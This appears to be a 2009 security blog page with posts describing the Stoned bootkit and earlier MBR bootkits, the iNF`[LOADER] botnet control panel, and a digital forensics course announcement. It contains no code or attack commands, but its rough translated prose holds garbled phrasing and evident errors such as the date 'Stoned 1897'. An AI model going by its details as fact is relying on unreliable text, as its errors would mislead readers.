By definition, a rootkit is designed to conceal certain activities that an attacker can take on a vulnerable system, precisely this characteristic being exploited by malware writers to hide the activities of the (handling registry keys, processes, files, etc.) at the time of infecting a system. That is, the primary objective of a rootkit is to prevent an attacker's activities are discovered.

This situation represents a serious potential danger to the security of any computer system and that depending on the type of rootkit can quietly go unnoticed because they generally have the ability to run a low level (kernel level).

Therefore, antivirus companies are characterized as hazardous or extremely hazardous, even, perhaps this is one of the responses on the efforts of securing the core operating system.

In this regard, earlier this year (2009) we witnessed the emergence of a type of rootkit that infects the MBR (Master Boot Record) of equipment, but unlike conventional rootkits of this style, this new variant is much more harmful and aggressive. His name is Stoned bootkit (based on the famous Stoned virus), was developed by Peter Kleissner and presented at BlackHat 2009.

When activated from the MBR, the infection bootkit ensures the equipment before starting the operating system can run from any storage device (USB, CD, DVD, etc.).. This means that no trace will be operating systems (processes in memory for example) because the bootkit no direct change on this.

Despite being considered a tool for handling a system (like the rootkit) as is its name suggests (toolkit boot sector) can, without doubt, be used for malicious purposes, and taking into Stoned Bootkit account that is designed to work well on Windows 7, regardless of their architecture (32-bit or 64-bit), may represent the most exploited malicious code during 2010.

Related information
Bootkit multiplataforma al ataque...

Jorge Mieres

Saturday, September 12, 2009

BootkitAnalytics: Under review status

Thanks to BootkitAnalytics team Vipin Kumar, Peter Klessner and Anushree Reddy, we are on editing stage. The final release should be there in about 10-20 days tops.


iNF`[LOADER]. Control of botnets, marihuana, and spreading malware

This is more of the many alternatives that exist for web applications designed to function as boards of directors and control botnets via web (C&C).

In this new example, how could it be otherwise, is of Russian origin and judging by the favicon and the image displayed in the upper left corner, perhaps his creator has admiration for marihuana and, why not, maybe it Bob Marley's fans :-)

Then observe the capture of the administration panel INF `[LOADER], but if we see another active too, can access ... better write me a mail and I pass the URL :-)

While this web application isn't new since its first version is 2007, its author was updated once per year (the current version 3) and the last is that we see in the catch, it was hardly within the crimeware underground environment.

At first he was associated with the spread of a rootkit called Goldun known, however it should be borne in mind that regardless of the malware that bring the kit by default, these applications are designed to exploit any vulnerability and disseminate any type of malware.

Among its modules, has one designed to try to bypass antivirus and firewall programs, self-destruction module with which you can remove the information from part or all of the zombies as part of its network, zombies statistics system discriminated country, among others.

As we see, the functionality offered by this threat aren't competitive in relation to others that exist in the market and are available at low cost even may even get a combo, although their cost doesn't exceed USD 100 now.

Still, this doesn't constitute a serious threat, regardless of the interface having the administration control panel and, if this force is because it has at its command, a good amount of zombies that make botmaster activity, a "work" profitable.

Related information
Fragus. Nueva botnet framework In-the-Wild
Liberty Exploit System. Otra alternativa crimeware...
Los precios del crimeware ruso. Parte 2
Eleonore Exploits Pack. Nuevo crimeware In-the-Wild
Especial!! ZeuS Botnet for Dummies

Jorge Mieres

Sunday, September 6, 2009

ICFE Course

ICFE CG will be organising a 1-Day Masterclass on "Understanding Cyber Crime and introduction to Digital Forensics", on 19 November 2009 in Parkroyal Hotel, Kuala Lumpur, Malaysia.

For more details click here.

Course Introduction:

Forensics is the application of science and technology to civil and criminal legal investigations. While most forensics programs focus on the traditional approaches — fingerprints, DNA, photography — the CSI World Headquarters inauguration program targets cyberforensics — forensic analysis and procedures of the new millennium.
The CSI-CyberForensics program focuses on the basics of computer forensics with an emphasis on the legal aspects and techniques for such investigation.

There is a whole new science to collecting evidence and ensuring it will be admissible in a court of law. In the computer age, systemic risk investigators must learn to catch someone who has committed a crime when the evidence is most likely to be found on that suspect's computer, PDA, cell phone, MP3 player, or other digital device. It's often highly sensitive data that, if mishandled, can be corrupted and lost forever.

Because computer-aided systemic risk and identity theft are on the rise with no end in sight, computer forensics training is essential for the modern systemic risk investigator. In America, the FBI sponsors the Regional Computer Forensics Laboratories (RCFLs) staed by local, state and federal law enforcement personnel to meet this very pressing need. In this rst CSI World Headquarters Malaysian Chapter inauguration meeting, CSI instructors will share their knowledge with the registered participants on this very interesting and exciting tool in cybercrime investigation.

You can expect more computer forensics labs to start appearing around the world, as digital experts continue to emerge and branch out. The career prospect in this specialized eld is just beginning to be realized. This is an opportunity to be a Certied System Investigator and a chance to be ahead of the market place in the world of digital forensics and cybercrime investigation.



Bootkit multi-platform attack. Is the resurrection of the boot viruses?

As many know, in the world of malicious code there is an extensive nomenclature to refer to each of the malicious programs that are walking around the large network, adopted according to the directions and purpose for which it was designed, with the most widely accepted English language. Even some direct translations are ugly ;P

In this connection, they may have read about a new name that has been doing a lot of noise from the last BlackHat: Bootkit. But ... what is it?

A bootkit is basically a type of rootkit designed to infect the boot sector of Windows operating systems, commonly known as the Master Boot Records (MBR).

While the rootkit concept dates back almost to the very existence of UNIX platforms and malicious code that abuse this feature isn't new, we could say that the concept of bootkit refers to a new family of malware to circumvent any system developed threat detection hosting its harmful instructions in the boot sector.

In fact there are several names that have made noise throughout history:
  • Stoned in 1987 (it was taken as the basis for the development of Michelangelo) showing different messages on the screen.
  • BootRoot first presented in 2005 during the BlackHat and designed to run on Windows XP.
  • Kon-Bot makes a baypass on Windows authentication scheme, jumping and the authentication process.
  • Vbootkit in 2007, which runs on Windows Vista and its second version appeared this year, designed to exploit in Windows 7 (including 64-bit). Both versions presented at the BlackHat.
  • MebRoot, whose first version appeared in 2007, is designed to steal bank details and nature of which we see a screenshot presented in the paper "Now Your Computer is Stoned (... Again!). The Rise of MBR Rootkits" jointly developed by Symantec and F-Secure showing its evolution.
  • Stoned Bootkit, also presented at BlackHat this year. It's multiplatform!
In the case of the two versions of Vbootkit, they are considered proof of concept (PoC), however, as any proof of concept, finished shooting a new mode of attack by malware and the second version (prepared for Windows 7) can be a serious threat for next year.

Now ... where is the most important point of all this. I think Mebroot marked the turning point adding to the illicit sphere a new methodology together with a concept that has direct relation to the crime in terms of using malware attacks that seek not only information that can be exploited even do intelligence or espionage, but also to fuel the economy of its developers, and continues with Vbootkit v2 now prepared to exploit Windows 7.

Under this scenario, the thing is heavy, since it is in complete professionalization of the evidence increasingly malware developers.

Stoned bootkit, is also designed to skip the security structures that offer products as TruCrypt by encrypting the entire volume of a unit, causing a direct attack on TrueCrypt. That is, has the ability to infect a computer even when encrypted, gaining access to the entire system regardless of safety precautions around the credentials with administrative permissions.

Ironically, the author uses a legend similar to the one that showed the old Stoned (Your PC is now Stoned!), Display each time you boot your system:

Your PC is now Stoned! ... again

Also unlike other rootkits to infect the boot sector of a specific operating system, the new Stoned has the ability to infect all versions from Windows XP to the highly anticipated Windows 7.

Given this, perhaps to become an essential module for malware writers seeking to break the security barriers of Windows 7.

Despite the absence of a significant amount of malicious code with these characteristics (bootkits) every time you receive one makes noise in the environment. Are we talking about resurrection? I think not. Especially after trying something he did not think possible at present: the Stoned 1897, still operates on Windows Vista.

# Jorge Mieres